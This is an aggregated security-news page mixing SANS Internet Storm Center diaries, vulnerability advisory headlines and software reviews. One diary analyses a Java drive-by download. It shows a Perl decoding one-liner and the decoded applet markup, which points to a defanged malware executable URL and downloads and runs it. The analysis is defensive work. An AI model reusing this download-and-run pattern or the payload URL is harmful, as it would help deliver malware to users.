InfoSec News

One place I try to keep up with is Russ McRee's ISSAToolsmith reviews of security tools. The December edition of the Toolsmith contains Russ's review of SamuraiWTF. SamuraiWTF is web-application pentesting framework on a liveCD assembled by Justin Searle from InGuardians and fellow ISCHandler Kevin Johnson of Secure Ideas.
Although SamuraiWTF is really too big to review in one magazine article, Russ does hit the high points in his review and concludes that SamuraiWTF rocks, plain and simple. It seems clear that if you spend any time doing webapp pentesting this is a tool that you should take a closer look at.

-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected) (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Excel add-in ASAP Utilities piles so many features onto Excel, it can make you dizzy. You can convert text to uppercase, lowercase, or proper case (first word capitalized), merge and import multiple files, and copy a selection to the clipboard as HTML. Jobs that you could already do get grouped logically into one place. For instance, the Vision Control dialog box lets you hide and unhide gridlines, page breaks, tabs, and scroll bars. You can easily reverse the order of selected cells, fill a range with random numbers, and change hyperlinks to hyperlink() formulas.
 
AjaxTerm 'ajaxterm.js' Session Hijacking Vulnerability
 
Following our earlier post on nasty network address ranges, ISC reader Tom wrote in with some interesting logs.His information ties a recent wave of Java exploits to several addresses in the same 91.204.48.0/22 netblock. The latest exploits in this case start with a file called new.htm, which contains obfuscated code as follows

This is easy to unravel - the numbers are Unicode and can be turned back into plain ASCII characters with a Perl line like this:
cat new.htm | perl -pe 's/u00(..)/chr(hex($1))/ge'
The resulting file looks as follows
applet name=Java Update code=Polat. class archive=Hidden. jar height=10 width=1

param name=url value=hxxp://benaguasil. net/host.exe
Yes, the above is slightly modified .. I tried to keep it plain enough that this diary can still be found via web search, but obfuscated enough to keep the less sophisticated anti-virus tools (like 90% of them) from triggering on this diary just because of the file name...
Nicely enough, we don't even have to use jad to decompile the Java class file - the url parameter passed to the applet is kinda telling all by itself. The good news is that host.exe already has pretty decent anti-virus coverage on VirusTotal.
But .. let's look at the Polat.class file anyway.



Nothing much going on here. A lot of smoke and mirrors, but basically, this Java Applet simply downloads the URL passed as a parameter (red underlines), writes it to a temp file called javafire.exe, and then tries to run the file (red box). If this doesn't work, the Applet creates a file named firem.bat containing a command to start javafire.exe, and then tries to launch the batch file.
Huh? Download and run? Shouldn't the Java Sandbox prevent this?
Sure. This openConnection-and-run method of drive-by download only works when it is paired with a Java exploit. Which is not the case here, the Java file is clean, and doesn't contain any exploit for a recent vulnerability. So what gives? Well, let's try it out, and see what happens...




A-ha! If you don't have any zero-days, you can always go back to exploiting the human! This is independent of the JRE version used - with JRE default settings, even on JRE1.6-23, all the user has to do is click Run to get owned. The one small improvement is that the latest JREs show Publisher: (NOT VERIFIED) Java Sun in the pop-up, but I guess that users who read past the two exclamation marks will be bound to click Run anyway ...

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Skype today blamed last week's outage on a combination of overloaded instant messaging servers, buggy software, and the failure of its "supernode" infrastructure.
 
Federal authorities have charged a California woman with securities fraud for allegedly passing detailed financial information on Nvidia and Marvell Technologies to portfolio managers at two hedge funds.
 
Everyone has a different way of managing their Web favorites--the sites they visit regularly. My method of choice is the Favorites Bar, which spans the top of the browser and puts my most-visited sites a single click away.
 
TYPSoft FTP Server 'RETR' Command Remote Denial Of Service Vulnerability
 
Rather than compete with Netflix for TV show and movie rentals, Apple should just buy its partner and rival, an industry said Wednesday.
 
[SECURITY] [DSA 2138-1] Security update for wordpress
 
Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
 
DzTube 'chid' Parameter SQL Injection Vulnerability
 

A look back at Cisco Security in 2010
NetworkWorld.com
Cisco took home the bronze in both IPS and FW readers choice awards in InfoSec Magazine 2010 results. In 2010, Cisco won the National Cybersecurity ...

and more »
 
Microsoft co-founder Paul Allen has revised his patent infringement lawsuit against 11 technology companies to include detailed claims against Google's Android OS, Apple's iTunes and App Store and Facebook's "Like" feature.
 
Pre Jobo .NET "Password" SQL Injection Vulnerability
 
Fedora 14 - Format string attack in allegro-tools package
 
Path disclosure in KaiBB
 
SQL injection in KaiBB
 
Digital Music Pad '.pls' File Remote Buffer Overflow Vulnerability
 
TYPO3 Core TYPO3-SA-2010-020 Multiple Security Vulnerabilities
 
PHP Address Book 'group_name' Parameter SQL Injection Vulnerability
 
The days of e-mailing the whole office to ask if anyone has a mobile-phone charger that fits your phone are numbered, as European standardization bodies on Wednesday released harmonized standards for a common charger.
 
Techphoebe QuickShare File Server Directory Traversal Vulnerability
 
YEKTAWEB CMS XSS Vulnerability
 
HotWeb Rentals "PageId" SQL Injection Vulnerability
 
[security bulletin] HPSBST02620 SSRT100356 rev.2 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access
 
Known for being a power user's antimalware tool, Kaspersky has quietly evolved its Kaspersky Internet Security software ($80 for a one-year, three-PC license, as of 12/2/2010) into a somewhat kinder, gentler application more suitable for the masses.
 
There is a lot to be said for minimalism, but with Titanium Internet Security 2011 ($70 for one year, three PCs, as of 12/2/2010), Trend Micro takes it to the extreme. The suite's user interface is one of the most simplistic and stripped-down of the security apps we tested. A simple summary of threats stopped, a link to the utility's parental controls, and the date that your subscription expires are all the information the primary display offers. Below that, you can choose to scan your system, configure options, or check your logs. A large blue "Tools" button is actually a red herring, telling you only whether parental controls and "data theft prevention" (a rather useless utility that mysteriously claims to "prevent hackers from stealing credit card numbers, passwords" and so forth) are turned on.
 
Novices will want to run, not walk, away from G-Data Internet Security 2011 ($40 for one year, one PC; $60 for one year, three PCs, as of 12/2/2010). While it's more than capable at stopping viruses, its complexity, cluttered interface, and overly scary warnings make it less appropriate for more casual users.
 
OfficeSuite Pro ($15, with a 15-day free trial) is one of a growing number of apps that try to strengthen Android's weak office-document support. OfficeSuite has an integrated file browser that allows you to view Word, PowerPoint, Excel, and PDF files on your device, SD Card, and configured Google Documents accounts. You can also create and edit Word and Excel files, but oddly enough you can save them only on your device or SD Card, not on Google Docs. If I can't send my document edits back to Google Docs, and I can't add new documents, what's the point?
 
Techguy15 wants to know how to get through to a Web page where he's getting a 404 Page Not Found error.
 
Nokia Siemens Networks' $1.2 billion acquisition of Motorola's cellular networks business has been delayed pending a review from Chinese government regulators.
 
The tech pro faces many career challenges and even a humorous situation or two. Here's a collection of such IT stories from InfoWorld readers
 
Storage technology has evolved faster than microprocessors over the past five decades, and it's been a bigger building block of the Internet -- and of today's ever-expanding 'cloud' -- than most people realize.
 
Storage technology has developed faster than microprocessors, and it's been a bigger enabler of the Internet -- and today's 'cloud' -- than most realize. Consider how quickly drive capacities have increased and prices have plummeted over the past 50 years, from the RAMAC 305 with 5MB capacity to 0.85-in. microdrives with gigabytes of space for data.
 

Washington Hilton Hotel, Washington
Help Net Security
... atmosphere for demonstrating technology exploitation, inventive software and hardware solutions, and open discussions of critical infosec issues. ...

 
There's no telling what the future will bring, but one thing is sure: In the world of technology, nothing stays the same for very long. The year 2010 wasn't terribly turbulent for tech, but 2011 is shaping up to be more of a thrill than you might expect. From Android's scorched-earth march across the industry to malware threats that we have yet to wrap our arms around, it seems as if everything is about to change.
 


Internet Storm Center Infocon Status